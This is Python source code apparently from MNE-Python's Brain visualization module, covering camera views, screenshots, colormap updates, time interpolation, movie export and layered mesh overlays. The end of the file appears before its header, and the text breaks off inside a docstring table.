From above with the brain pointing up (same as ``'dorsal'``). ``'sagittal'`` From the right side. ``'coronal'`` From the rear. Three letter abbreviations (e.g., ``'lat'``) of all of the above are also supported. """ _validate_type(row, ('int-like', None), 'row') _validate_type(col, ('int-like', None), 'col') hemi = self._hemi if hemi is None else hemi if hemi == 'split': if (self._view_layout == 'vertical' and col == 1 or self._view_layout == 'horizontal' and row == 1): hemi = 'rh' else: hemi = 'lh' _validate_type(view, (str, None), 'view') view_params = dict(azimuth=azimuth, elevation=elevation, roll=roll, distance=distance, focalpoint=focalpoint) if view is not None: # view_params take precedence view_params = {param: val for param, val in view_params.items() if val is not None} # no overwriting with None view_params = dict(views_dicts[hemi].get(view), **view_params) xfm = self._rigid if align else None for h in self._hemis: for ri, ci, _ in self._iter_views(h): if (row is None or row == ri) and (col is None or col == ci): self._renderer.set_camera( **view_params, reset_camera=False, rigid=xfm) self._renderer._update() def reset_view(self): """Reset the camera.""" for h in self._hemis: for _, _, v in self._iter_views(h): self._renderer.set_camera(**views_dicts[h][v], reset_camera=False) def save_image(self, filename=None, mode='rgb'): """Save view from all panels to disk. Parameters ---------- filename : str Path to new image file. mode : str Either 'rgb' or 'rgba' for values to return. """ if filename is None: filename = _generate_default_filename(".png") _save_ndarray_img( filename, self.screenshot(mode=mode, time_viewer=True)) @fill_doc def screenshot(self, mode='rgb', time_viewer=False): """Generate a screenshot of current view. Parameters ---------- mode : str Either 'rgb' or 'rgba' for values to return. %(brain_screenshot_time_viewer)s Returns ------- screenshot : array Image pixel values. 
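
        Examples
        --------
        A minimal sketch, assuming ``brain`` is an existing ``Brain`` instance
        and that matplotlib is available::

            img = brain.screenshot(mode='rgb')
            import matplotlib.pyplot as plt
            plt.imsave('brain.png', img)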
""" n_channels = 3 if mode == 'rgb' else 4 img = self._renderer.screenshot(mode) logger.debug(f'Got screenshot of size {img.shape}') if time_viewer and self.time_viewer and \ self.show_traces and \ not self.separate_canvas: from matplotlib.image import imread canvas = self.mpl_canvas.fig.canvas canvas.draw_idle() fig = self.mpl_canvas.fig with BytesIO() as output: # Need to pass dpi here so it uses the physical (HiDPI) DPI # rather than logical DPI when saving in most cases. # But when matplotlib uses HiDPI and VTK doesn't # (e.g., macOS w/Qt 5.14+ and VTK9) then things won't work, # so let's just calculate the DPI we need to get # the correct size output based on the widths being equal size_in = fig.get_size_inches() dpi = fig.get_dpi() want_size = tuple(x * dpi for x in size_in) n_pix = want_size[0] * want_size[1] logger.debug( f'Saving figure of size {size_in} @ {dpi} DPI ' f'({want_size} = {n_pix} pixels)') # Sometimes there can be off-by-one errors here (e.g., # if in mpl int() rather than int(round()) is used to # compute the number of pixels) so rather than use "raw" # format and try to reshape ourselves, just write to PNG # and read it, which has the dimensions encoded for us. fig.savefig(output, dpi=dpi, format='png', facecolor=self._bg_color, edgecolor='none') output.seek(0) trace_img = imread(output, format='png')[:, :, :n_channels] trace_img = np.clip( np.round(trace_img * 255), 0, 255).astype(np.uint8) bgcolor = np.array(self._brain_color[:n_channels]) / 255 img = concatenate_images([img, trace_img], bgcolor=bgcolor, n_channels=n_channels) return img @contextlib.contextmanager def _no_lut_update(self, why): orig = self._lut_locked self._lut_locked = why try: yield finally: self._lut_locked = orig @fill_doc def update_lut(self, fmin=None, fmid=None, fmax=None, alpha=None): """Update color map. 
Parameters ---------- %(fmin_fmid_fmax)s %(alpha)s """ args = f'{fmin}, {fmid}, {fmax}, {alpha}' if self._lut_locked is not None: logger.debug(f'LUT update postponed with {args}') return logger.debug(f'Updating LUT with {args}') center = self._data['center'] colormap = self._data['colormap'] transparent = self._data['transparent'] lims = {key: self._data[key] for key in ('fmin', 'fmid', 'fmax')} _update_monotonic(lims, fmin=fmin, fmid=fmid, fmax=fmax) assert all(val is not None for val in lims.values()) self._data.update(lims) self._data['ctable'] = np.round( calculate_lut(colormap, alpha=1., center=center, transparent=transparent, **lims) * 255).astype(np.uint8) # update our values rng = self._cmap_range ctable = self._data['ctable'] for hemi in ['lh', 'rh', 'vol']: hemi_data = self._data.get(hemi) if hemi_data is not None: if hemi in self._layered_meshes: mesh = self._layered_meshes[hemi] mesh.update_overlay(name='data', colormap=self._data['ctable'], opacity=alpha, rng=rng) self._renderer._set_colormap_range( mesh._actor, ctable, self._scalar_bar, rng, self._brain_color) grid_volume_pos = hemi_data.get('grid_volume_pos') grid_volume_neg = hemi_data.get('grid_volume_neg') for grid_volume in (grid_volume_pos, grid_volume_neg): if grid_volume is not None: self._renderer._set_volume_range( grid_volume, ctable, hemi_data['alpha'], self._scalar_bar, rng) glyph_actor = hemi_data.get('glyph_actor') if glyph_actor is not None: for glyph_actor_ in glyph_actor: self._renderer._set_colormap_range( glyph_actor_, ctable, self._scalar_bar, rng) if self.time_viewer: with self._no_lut_update(f'update_lut {args}'): for key in ('fmin', 'fmid', 'fmax'): self.callbacks[key](lims[key]) self._renderer._update() def set_data_smoothing(self, n_steps): """Set the number of smoothing steps. Parameters ---------- n_steps : int Number of smoothing steps. """ from ...morph import _hemi_morph for hemi in ['lh', 'rh']: hemi_data = self._data.get(hemi) if hemi_data is not None: if len(hemi_data['array']) >= self.geo[hemi].x.shape[0]: continue vertices = hemi_data['vertices'] if vertices is None: raise ValueError( 'len(data) < nvtx (%s < %s): the vertices ' 'parameter must not be None' % (len(hemi_data), self.geo[hemi].x.shape[0])) morph_n_steps = 'nearest' if n_steps == -1 else n_steps with use_log_level(False): smooth_mat = _hemi_morph( self.geo[hemi].orig_faces, np.arange(len(self.geo[hemi].coords)), vertices, morph_n_steps, maps=None, warn=False) self._data[hemi]['smooth_mat'] = smooth_mat self.set_time_point(self._data['time_idx']) self._data['smoothing_steps'] = n_steps @property def _n_times(self): return len(self._times) if self._times is not None else None @property def time_interpolation(self): """The interpolation mode.""" return self._time_interpolation @fill_doc def set_time_interpolation(self, interpolation): """Set the interpolation mode. 
Parameters ---------- %(brain_time_interpolation)s """ self._time_interpolation = _check_option( 'interpolation', interpolation, ('linear', 'nearest', 'zero', 'slinear', 'quadratic', 'cubic') ) self._time_interp_funcs = dict() self._time_interp_inv = None if self._times is not None: idx = np.arange(self._n_times) for hemi in ['lh', 'rh', 'vol']: hemi_data = self._data.get(hemi) if hemi_data is not None: array = hemi_data['array'] self._time_interp_funcs[hemi] = _safe_interp1d( idx, array, self._time_interpolation, axis=-1, assume_sorted=True) self._time_interp_inv = _safe_interp1d(idx, self._times) def set_time_point(self, time_idx): """Set the time point shown (can be a float to interpolate). Parameters ---------- time_idx : int | float The time index to use. Can be a float to use interpolation between indices. """ self._current_act_data = dict() time_actor = self._data.get('time_actor', None) time_label = self._data.get('time_label', None) for hemi in ['lh', 'rh', 'vol']: hemi_data = self._data.get(hemi) if hemi_data is not None: array = hemi_data['array'] # interpolate in time vectors = None if array.ndim == 1: act_data = array self._current_time = 0 else: act_data = self._time_interp_funcs[hemi](time_idx) self._current_time = self._time_interp_inv(time_idx) if array.ndim == 3: vectors = act_data act_data = np.linalg.norm(act_data, axis=1) self._current_time = self._time_interp_inv(time_idx) self._current_act_data[hemi] = act_data if time_actor is not None and time_label is not None: time_actor.SetInput(time_label(self._current_time)) # update the volume interpolation grid = hemi_data.get('grid') if grid is not None: vertices = self._data['vol']['vertices'] values = self._current_act_data['vol'] rng = self._cmap_range fill = 0 if self._data['center'] is not None else rng[0] _cell_data(grid)['values'].fill(fill) # XXX for sided data, we probably actually need two # volumes as composite/MIP needs to look at two # extremes... for now just use abs. Eventually we can add # two volumes if we want. _cell_data(grid)['values'][vertices] = values # interpolate in space smooth_mat = hemi_data.get('smooth_mat') if smooth_mat is not None: act_data = smooth_mat.dot(act_data) # update the mesh scalar values if hemi in self._layered_meshes: mesh = self._layered_meshes[hemi] if 'data' in mesh._overlays: mesh.update_overlay(name='data', scalars=act_data) else: mesh.add_overlay( scalars=act_data, colormap=self._data['ctable'], rng=self._cmap_range, opacity=None, name='data', ) # update the glyphs if vectors is not None: self._update_glyphs(hemi, vectors) self._data['time_idx'] = time_idx self._renderer._update() def set_time(self, time): """Set the time to display (in seconds). Parameters ---------- time : float The time to show, in seconds. 
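
        Examples
        --------
        A minimal sketch, assuming ``brain`` holds time-resolved data added
        via ``add_data`` with times given in seconds::

            brain.set_time(0.1)        # jump to 100 ms
            brain.set_time_point(0)    # or address the first sample directly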
""" if self._times is None: raise ValueError( 'Cannot set time when brain has no defined times.') elif min(self._times) <= time <= max(self._times): self.set_time_point(np.interp(float(time), self._times, np.arange(self._n_times))) else: raise ValueError( f'Requested time ({time} s) is outside the range of ' f'available times ({min(self._times)}-{max(self._times)} s).') def _update_glyphs(self, hemi, vectors): hemi_data = self._data.get(hemi) assert hemi_data is not None vertices = hemi_data['vertices'] vector_alpha = self._data['vector_alpha'] scale_factor = self._data['scale_factor'] vertices = slice(None) if vertices is None else vertices x, y, z = np.array(self.geo[hemi].coords)[vertices].T if hemi_data['glyph_actor'] is None: add = True hemi_data['glyph_actor'] = list() else: add = False count = 0 for _ in self._iter_views(hemi): if hemi_data['glyph_dataset'] is None: glyph_mapper, glyph_dataset = self._renderer.quiver3d( x, y, z, vectors[:, 0], vectors[:, 1], vectors[:, 2], color=None, mode='2darrow', scale_mode='vector', scale=scale_factor, opacity=vector_alpha, name=str(hemi) + "_glyph" ) hemi_data['glyph_dataset'] = glyph_dataset hemi_data['glyph_mapper'] = glyph_mapper else: glyph_dataset = hemi_data['glyph_dataset'] _point_data(glyph_dataset)['vec'] = vectors glyph_mapper = hemi_data['glyph_mapper'] if add: glyph_actor = self._renderer._actor(glyph_mapper) prop = glyph_actor.GetProperty() prop.SetLineWidth(2.) prop.SetOpacity(vector_alpha) self._renderer.plotter.add_actor(glyph_actor, render=False) hemi_data['glyph_actor'].append(glyph_actor) else: glyph_actor = hemi_data['glyph_actor'][count] count += 1 self._renderer._set_colormap_range( actor=glyph_actor, ctable=self._data['ctable'], scalar_bar=None, rng=self._cmap_range, ) @property def _cmap_range(self): dt_max = self._data['fmax'] if self._data['center'] is None: dt_min = self._data['fmin'] else: dt_min = -1 * dt_max rng = [dt_min, dt_max] return rng def _update_fscale(self, fscale): """Scale the colorbar points.""" fmin = self._data['fmin'] * fscale fmid = self._data['fmid'] * fscale fmax = self._data['fmax'] * fscale self.update_lut(fmin=fmin, fmid=fmid, fmax=fmax) def _update_auto_scaling(self, restore=False): user_clim = self._data['clim'] if user_clim is not None and 'lims' in user_clim: allow_pos_lims = False else: allow_pos_lims = True if user_clim is not None and restore: clim = user_clim else: clim = 'auto' colormap = self._data['colormap'] transparent = self._data['transparent'] mapdata = _process_clim( clim, colormap, transparent, np.concatenate(list(self._current_act_data.values())), allow_pos_lims) diverging = 'pos_lims' in mapdata['clim'] colormap = mapdata['colormap'] scale_pts = mapdata['clim']['pos_lims' if diverging else 'lims'] transparent = mapdata['transparent'] del mapdata fmin, fmid, fmax = scale_pts center = 0. 
if diverging else None self._data['center'] = center self._data['colormap'] = colormap self._data['transparent'] = transparent self.update_lut(fmin=fmin, fmid=fmid, fmax=fmax) def _to_time_index(self, value): """Return the interpolated time index of the given time value.""" time = self._data['time'] value = np.interp(value, time, np.arange(len(time))) return value @property def data(self): """Data used by time viewer and color bar widgets.""" return self._data @property def labels(self): return self._labels @property def views(self): return self._views @property def hemis(self): return self._hemis def _save_movie(self, filename, time_dilation=4., tmin=None, tmax=None, framerate=24, interpolation=None, codec=None, bitrate=None, callback=None, time_viewer=False, **kwargs): import imageio with self._renderer._disabled_interaction(): images = self._make_movie_frames( time_dilation, tmin, tmax, framerate, interpolation, callback, time_viewer) # find imageio FFMPEG parameters if 'fps' not in kwargs: kwargs['fps'] = framerate if codec is not None: kwargs['codec'] = codec if bitrate is not None: kwargs['bitrate'] = bitrate imageio.mimwrite(filename, images, **kwargs) def _save_movie_tv(self, filename, time_dilation=4., tmin=None, tmax=None, framerate=24, interpolation=None, codec=None, bitrate=None, callback=None, time_viewer=False, **kwargs): def frame_callback(frame, n_frames): if frame == n_frames: # On the ImageIO step self.status_msg.set_value( "Saving with ImageIO: %s" % filename ) self.status_msg.show() self.status_progress.hide() self._renderer._status_bar_update() else: self.status_msg.set_value( "Rendering images (frame %d / %d) ..." % (frame + 1, n_frames) ) self.status_msg.show() self.status_progress.show() self.status_progress.set_range([0, n_frames - 1]) self.status_progress.set_value(frame) self.status_progress.update() self.status_msg.update() self._renderer._status_bar_update() # set cursor to busy default_cursor = self._renderer._window_get_cursor() self._renderer._window_set_cursor( self._renderer._window_new_cursor("WaitCursor")) try: self._save_movie(filename, time_dilation, tmin, tmax, framerate, interpolation, codec, bitrate, frame_callback, time_viewer, **kwargs) except (Exception, KeyboardInterrupt): warn('Movie saving aborted:\n' + traceback.format_exc()) finally: self._renderer._window_set_cursor(default_cursor) @fill_doc def save_movie(self, filename=None, time_dilation=4., tmin=None, tmax=None, framerate=24, interpolation=None, codec=None, bitrate=None, callback=None, time_viewer=False, **kwargs): """Save a movie (for data with a time axis). The movie is created through the :mod:`imageio` module. The format is determined by the extension, and additional options can be specified through keyword arguments that depend on the format, see :doc:`imageio's format page <imageio:formats/index>`. .. Warning:: This method assumes that time is specified in seconds when adding data. If time is specified in milliseconds this will result in movies 1000 times longer than expected. Parameters ---------- filename : str Path at which to save the movie. The extension determines the format (e.g., ``'*.mov'``, ``'*.gif'``, ...; see the :mod:`imageio` documentation for available formats). time_dilation : float Factor by which to stretch time (default 4). For example, an epoch from -100 to 600 ms lasts 700 ms. With ``time_dilation=4`` this would result in a 2.8 s long movie. tmin : float First time point to include (default: all data). 
tmax : float Last time point to include (default: all data). framerate : float Framerate of the movie (frames per second, default 24). %(brain_time_interpolation)s If None, it uses the current ``brain.interpolation``, which defaults to ``'nearest'``. Defaults to None. codec : str | None The codec to use. bitrate : float | None The bitrate to use. callback : callable | None A function to call on each iteration. Useful for status message updates. It will be passed keyword arguments ``frame`` and ``n_frames``. %(brain_screenshot_time_viewer)s **kwargs : dict Specify additional options for :mod:`imageio`. """ if filename is None: filename = _generate_default_filename(".mp4") func = self._save_movie_tv if self.time_viewer else self._save_movie func(filename, time_dilation, tmin, tmax, framerate, interpolation, codec, bitrate, callback, time_viewer, **kwargs) def _make_movie_frames(self, time_dilation, tmin, tmax, framerate, interpolation, callback, time_viewer): from math import floor # find tmin if tmin is None: tmin = self._times[0] elif tmin < self._times[0]: raise ValueError("tmin=%r is smaller than the first time point " "(%r)" % (tmin, self._times[0])) # find indexes at which to create frames if tmax is None: tmax = self._times[-1] elif tmax > self._times[-1]: raise ValueError("tmax=%r is greater than the latest time point " "(%r)" % (tmax, self._times[-1])) n_frames = floor((tmax - tmin) * time_dilation * framerate) times = np.arange(n_frames, dtype=float) times /= framerate * time_dilation times += tmin time_idx = np.interp(times, self._times, np.arange(self._n_times)) n_times = len(time_idx) if n_times == 0: raise ValueError("No time points selected") logger.debug("Save movie for time points/samples\n%s\n%s" % (times, time_idx)) # Sometimes the first screenshot is rendered with a different # resolution on OS X self.screenshot(time_viewer=time_viewer) old_mode = self.time_interpolation if interpolation is not None: self.set_time_interpolation(interpolation) try: images = [ self.screenshot(time_viewer=time_viewer) for _ in self._iter_time(time_idx, callback)] finally: self.set_time_interpolation(old_mode) if callback is not None: callback(frame=len(time_idx), n_frames=len(time_idx)) return images def _iter_time(self, time_idx, callback): """Iterate through time points, then reset to current time. Parameters ---------- time_idx : array_like Time point indexes through which to iterate. callback : callable | None Callback to call before yielding each frame. Yields ------ idx : int | float Current index. Notes ----- Used by movie and image sequence saving functions. 
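
        Examples
        --------
        A rough sketch of the internal caller pattern (illustrative only)::

            time_idx = np.linspace(0, self._n_times - 1, 10)
            frames = [self.screenshot()
                      for _ in self._iter_time(time_idx, callback=None)]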
""" if self.time_viewer: func = partial(self.callbacks["time"], update_widget=True) else: func = self.set_time_point current_time_idx = self._data["time_idx"] for ii, idx in enumerate(time_idx): func(idx) if callback is not None: callback(frame=ii, n_frames=len(time_idx)) yield idx # Restore original time index func(current_time_idx) def _check_stc(self, hemi, array, vertices): from ...source_estimate import ( _BaseSourceEstimate, _BaseSurfaceSourceEstimate, _BaseMixedSourceEstimate, _BaseVolSourceEstimate ) if isinstance(array, _BaseSourceEstimate): stc = array stc_surf = stc_vol = None if isinstance(stc, _BaseSurfaceSourceEstimate): stc_surf = stc elif isinstance(stc, _BaseMixedSourceEstimate): stc_surf = stc.surface() if hemi != 'vol' else None stc_vol = stc.volume() if hemi == 'vol' else None elif isinstance(stc, _BaseVolSourceEstimate): stc_vol = stc if hemi == 'vol' else None else: raise TypeError("stc not supported") if stc_surf is None and stc_vol is None: raise ValueError("No data to be added") if stc_surf is not None: array = getattr(stc_surf, hemi + '_data') vertices = stc_surf.vertices[0 if hemi == 'lh' else 1] if stc_vol is not None: array = stc_vol.data vertices = np.concatenate(stc_vol.vertices) else: stc = None return stc, array, vertices def _check_hemi(self, hemi, extras=()): """Check for safe single-hemi input, returns str.""" _validate_type(hemi, (None, str), 'hemi') if hemi is None: if self._hemi not in ['lh', 'rh']: raise ValueError('hemi must not be None when both ' 'hemispheres are displayed') hemi = self._hemi _check_option('hemi', hemi, ('lh', 'rh') + tuple(extras)) return hemi def _check_hemis(self, hemi): """Check for safe dual or single-hemi input, returns list.""" if hemi is None: if self._hemi not in ['lh', 'rh']: hemi = ['lh', 'rh'] else: hemi = [self._hemi] elif hemi not in ['lh', 'rh']: extra = ' or None' if self._hemi in ['lh', 'rh'] else '' raise ValueError('hemi must be either "lh" or "rh"' + extra) else: hemi = [hemi] return hemi def _to_borders(self, label, hemi, borders, restrict_idx=None): """Convert a label/parc to borders.""" if not isinstance(borders, (bool, int)) or borders < 0: raise ValueError('borders must be a bool or positive integer') if borders: n_vertices = label.size edges = mesh_edges(self.geo[hemi].orig_faces) edges = edges.tocoo() border_edges = label[edges.row] != label[edges.col] show = np.zeros(n_vertices, dtype=np.int64) keep_idx = np.unique(edges.row[border_edges]) if isinstance(borders, int): for _ in range(borders): keep_idx = np.in1d( self.geo[hemi].orig_faces.ravel(), keep_idx) keep_idx.shape = self.geo[hemi].orig_faces.shape keep_idx = self.geo[hemi].orig_faces[ np.any(keep_idx, axis=1)] keep_idx = np.unique(keep_idx) if restrict_idx is not None: keep_idx = keep_idx[np.in1d(keep_idx, restrict_idx)] show[keep_idx] = 1 label *= show @deprecated('enable_depth_peeling is deprecated and will be ' 'removed in 1.1') def enable_depth_peeling(self): """Enable depth peeling. """ self._renderer._enable_depth_peeling() def get_picked_points(self): """Return the vertices of the picked points. Returns ------- points : list of int | None The vertices picked by the time viewer. 
""" if hasattr(self, "time_viewer"): return self.picked_points def __hash__(self): """Hash the object.""" raise NotImplementedError def _safe_interp1d(x, y, kind='linear', axis=-1, assume_sorted=False): """Work around interp1d not liking singleton dimensions.""" from scipy.interpolate import interp1d if y.shape[axis] == 1: def func(x): return np.take(y, np.zeros(np.asarray(x).shape, int), axis=axis) return func else: return interp1d(x, y, kind, axis=axis, assume_sorted=assume_sorted) def _update_limits(fmin, fmid, fmax, center, array): if center is None: if fmin is None: fmin = array.min() if array.size > 0 else 0 if fmax is None: fmax = array.max() if array.size > 0 else 1 else: if fmin is None: fmin = 0 if fmax is None: fmax = np.abs(center - array).max() if array.size > 0 else 1 if fmid is None: fmid = (fmin + fmax) / 2. if fmin >= fmid: raise RuntimeError('min must be < mid, got %0.4g >= %0.4g' % (fmin, fmid)) if fmid >= fmax: raise RuntimeError('mid must be < max, got %0.4g >= %0.4g' % (fmid, fmax)) return fmin, fmid, fmax def _update_monotonic(lims, fmin, fmid, fmax): if fmin is not None: lims['fmin'] = fmin if lims['fmax'] < fmin: logger.debug(f' Bumping fmax = {lims['fmax']} to {fmin}') lims['fmax'] = fmin if lims['fmid'] < fmin: logger.debug(f' Bumping fmid = {lims['fmid']} to {fmin}') lims['fmid'] = fmin assert lims['fmin'] <= lims['fmid'] <= lims['fmax'] if fmid is not None: lims['fmid'] = fmid if lims['fmin'] > fmid: logger.debug(f' Bumping fmin = {lims['fmin']} to {fmid}') lims['fmin'] = fmid if lims['fmax'] < fmid: logger.debug(f' Bumping fmax = {lims['fmax']} to {fmid}') lims['fmax'] = fmid assert lims['fmin'] <= lims['fmid'] <= lims['fmax'] if fmax is not None: lims['fmax'] = fmax if lims['fmin'] > fmax: logger.debug(f' Bumping fmin = {lims['fmin']} to {fmax}') lims['fmin'] = fmax if lims['fmid'] > fmax: logger.debug(f' Bumping fmid = {lims['fmid']} to {fmax}') lims['fmid'] = fmax assert lims['fmin'] <= lims['fmid'] <= lims['fmax'] def _get_range(brain): val = np.abs(np.concatenate(list(brain._current_act_data.values()))) return [np.min(val), np.max(val)] class _FakeIren(): def EnterEvent(self): pass def MouseMoveEvent(self): pass def LeaveEvent(self): pass def SetEventInformation(self, *args, **kwargs): pass def CharEvent(self): pass def KeyPressEvent(self, *args, **kwargs): pass def KeyReleaseEvent(self, *args, **kwargs): pass
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr> # Eric Larson <larson.eric.d@gmail.com> # Oleh Kozynets <ok7mailbox@gmail.com> # Guillaume Favelier <guillaume.favelier@gmail.com> # jona-sassenhagen <jona.sassenhagen@gmail.com> # Joan Massich <mailsik@gmail.com> # # License: Simplified BSD import contextlib from functools import partial from io import BytesIO import os import os.path as op import time import copy import traceback import warnings import numpy as np from collections import OrderedDict from .colormap import calculate_lut from .surface import _Surface from .view import views_dicts, _lh_views_dict from .callback import (ShowView, TimeCallBack, SmartCallBack, UpdateLUT, UpdateColorbarScale) from ..utils import (_show_help_fig, _get_color_list, concatenate_images, _generate_default_filename, _save_ndarray_img, safe_event) from .._3d import (_process_clim, _handle_time, _check_views, _handle_sensor_types, _plot_sensors, _plot_forward) from ...defaults import _handle_default, DEFAULTS from ...fixes import _point_data, _cell_data from ..._freesurfer import (vertex_to_mni, read_talxfm, read_freesurfer_lut, _get_head_surface, _get_skull_surface) from ...io.pick import pick_types from ...io.meas_info import Info from ...surface import (mesh_edges, _mesh_borders, _marching_cubes, get_meg_helmet_surf) from ...source_space import SourceSpaces from ...transforms import (Transform, apply_trans, invert_transform, _get_trans, _get_transforms_to_coord_frame, _frame_to_str) from ...utils import (_check_option, logger, verbose, fill_doc, _validate_type, use_log_level, Bunch, _ReuseCycle, warn, deprecated, get_subjects_dir, _check_fname, _to_rgb) _ARROW_MOVE = 10 # degrees per press class _Overlay(object): def __init__(self, scalars, colormap, rng, opacity, name): self._scalars = scalars self._colormap = colormap assert rng is not None self._rng = rng self._opacity = opacity self._name = name def to_colors(self): from .._3d import _get_cmap from matplotlib.colors import Colormap, ListedColormap if isinstance(self._colormap, str): cmap = _get_cmap(self._colormap) elif isinstance(self._colormap, Colormap): cmap = self._colormap else: cmap = ListedColormap( self._colormap / 255., name=str(type(self._colormap))) logger.debug( f'Color mapping {repr(self._name)} with {cmap.name} ' f'colormap and range {self._rng}') rng = self._rng assert rng is not None scalars = _norm(self._scalars, rng) colors = cmap(scalars) if self._opacity is not None: colors[:, 3] *= self._opacity return colors def _norm(x, rng): if rng[0] == rng[1]: factor = 1 if rng[0] == 0 else 1e-6 * rng[0] else: factor = rng[1] - rng[0] return (x - rng[0]) / factor class _LayeredMesh(object): def __init__(self, renderer, vertices, triangles, normals): self._renderer = renderer self._vertices = vertices self._triangles = triangles self._normals = normals self._polydata = None self._actor = None self._is_mapped = False self._current_colors = None self._cached_colors = None self._overlays = OrderedDict() self._default_scalars = np.ones(vertices.shape) self._default_scalars_name = 'Data' def map(self): kwargs = { "color": None, "pickable": True, "rgba": True, } mesh_data = self._renderer.mesh( x=self._vertices[:, 0], y=self._vertices[:, 1], z=self._vertices[:, 2], triangles=self._triangles, normals=self._normals, scalars=self._default_scalars, **kwargs ) self._actor, self._polydata = mesh_data self._is_mapped = True def _compute_over(self, B, A): assert A.ndim == B.ndim == 2 assert A.shape[1] == B.shape[1] == 4 A_w = A[:, 3:] # * 1 
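        # Porter-Duff "over" compositing of A on top of B: RGB is accumulated
        # premultiplied (A weighted by its own alpha, B by what A leaves
        # uncovered) and un-premultiplied by the combined alpha at the end.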
B_w = B[:, 3:] * (1 - A_w) C = A.copy() C[:, :3] *= A_w C[:, :3] += B[:, :3] * B_w C[:, 3:] += B_w C[:, :3] /= C[:, 3:] return np.clip(C, 0, 1, out=C) def _compose_overlays(self): B = cache = None for overlay in self._overlays.values(): A = overlay.to_colors() if B is None: B = A else: cache = B B = self._compute_over(cache, A) return B, cache def add_overlay(self, scalars, colormap, rng, opacity, name): overlay = _Overlay( scalars=scalars, colormap=colormap, rng=rng, opacity=opacity, name=name, ) self._overlays[name] = overlay colors = overlay.to_colors() if self._current_colors is None: self._current_colors = colors else: # save previous colors to cache self._cached_colors = self._current_colors self._current_colors = self._compute_over( self._cached_colors, colors) # apply the texture self._apply() def remove_overlay(self, names): to_update = False if not isinstance(names, list): names = [names] for name in names: if name in self._overlays: del self._overlays[name] to_update = True if to_update: self.update() def _apply(self): if self._current_colors is None or self._renderer is None: return self._renderer._set_mesh_scalars( mesh=self._polydata, scalars=self._current_colors, name=self._default_scalars_name, ) def update(self, colors=None): if colors is not None and self._cached_colors is not None: self._current_colors = self._compute_over( self._cached_colors, colors) else: self._current_colors, self._cached_colors = \ self._compose_overlays() self._apply() def _clean(self): mapper = self._actor.GetMapper() mapper.SetLookupTable(None) self._actor.SetMapper(None) self._actor = None self._polydata = None self._renderer = None def update_overlay(self, name, scalars=None, colormap=None, opacity=None, rng=None): overlay = self._overlays.get(name, None) if overlay is None: return if scalars is not None: overlay._scalars = scalars if colormap is not None: overlay._colormap = colormap if opacity is not None: overlay._opacity = opacity if rng is not None: overlay._rng = rng # partial update: use cache if possible if name == list(self._overlays.keys())[-1]: self.update(colors=overlay.to_colors()) else: # full update self.update() @fill_doc class Brain(object): """Class for visualizing a brain. .. warning:: The API for this class is not currently complete. We suggest using :meth:`mne.viz.plot_source_estimates` with the PyVista backend enabled to obtain a ``Brain`` instance. Parameters ---------- subject_id : str Subject name in Freesurfer subjects dir. hemi : str Hemisphere id (ie 'lh', 'rh', 'both', or 'split'). In the case of 'both', both hemispheres are shown in the same window. In the case of 'split' hemispheres are displayed side-by-side in different viewing panes. surf : str FreeSurfer surface mesh name (ie 'white', 'inflated', etc.). title : str Title for the window. cortex : str, list, dict Specifies how the cortical surface is rendered. Options: 1. The name of one of the preset cortex styles: ``'classic'`` (default), ``'high_contrast'``, ``'low_contrast'``, or ``'bone'``. 2. A single color-like argument to render the cortex as a single color, e.g. ``'red'`` or ``(0.1, 0.4, 1.)``. 3. A list of two color-like used to render binarized curvature values for gyral (first) and sulcal (second). regions, e.g., ``['red', 'blue']`` or ``[(1, 0, 0), (0, 0, 1)]``. 4. A dict containing keys ``'vmin', 'vmax', 'colormap'`` with values used to render the binarized curvature (where 0 is gyral, 1 is sulcal). .. versionchanged:: 0.24 Add support for non-string arguments. 
alpha : float in [0, 1] Alpha level to control opacity of the cortical surface. size : int | array-like, shape (2,) The size of the window, in pixels. can be one number to specify a square window, or a length-2 sequence to specify (width, height). background : tuple(int, int, int) The color definition of the background: (red, green, blue). foreground : matplotlib color Color of the foreground (will be used for colorbars and text). None (default) will use black or white depending on the value of ``background``. figure : list of Figure | None If None (default), a new window will be created with the appropriate views. subjects_dir : str | None If not None, this directory will be used as the subjects directory instead of the value set using the SUBJECTS_DIR environment variable. %(views)s offset : bool | str If True, shifts the right- or left-most x coordinate of the left and right surfaces, respectively, to be at zero. This is useful for viewing inflated surface where hemispheres typically overlap. Can be "auto" (default) use True with inflated surfaces and False otherwise (Default: 'auto'). Only used when ``hemi='both'``. .. versionchanged:: 0.23 Default changed to "auto". show_toolbar : bool If True, toolbars will be shown for each view. offscreen : bool If True, rendering will be done offscreen (not shown). Useful mostly for generating images or screenshots, but can be buggy. Use at your own risk. interaction : str Can be "trackball" (default) or "terrain", i.e. a turntable-style camera. units : str Can be 'm' or 'mm' (default). %(view_layout)s silhouette : dict | bool As a dict, it contains the ``color``, ``linewidth``, ``alpha`` opacity and ``decimate`` (level of decimation between 0 and 1 or None) of the brain's silhouette to display. If True, the default values are used and if False, no silhouette will be displayed. Defaults to False. theme : str | path-like Can be "auto" (default), "light", or "dark" or a path-like to a custom stylesheet. For Dark-Mode and automatic Dark-Mode-Detection, :mod:`qdarkstyle` respectively and `darkdetect <https://github.com/albertosottile/darkdetect>`__ is required. show : bool Display the window as soon as it is ready. Defaults to True. block : bool If True, start the Qt application event loop. Default to False. Attributes ---------- geo : dict A dictionary of PyVista surface objects for each hemisphere. overlays : dict The overlays. Notes ----- This table shows the capabilities of each Brain backend ("✓" for full support, and "-" for partial support): .. 
table:: :widths: auto +-------------------------------------+--------------+---------------+ | 3D function: | surfer.Brain | mne.viz.Brain | +=====================================+==============+===============+ | :meth:`add_annotation` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_data` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_dipole` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_foci` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_forward` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_head` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_label` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_sensors` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_skull` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_text` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_volume_labels` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`close` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | data | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | foci | ✓ | | +-------------------------------------+--------------+---------------+ | labels 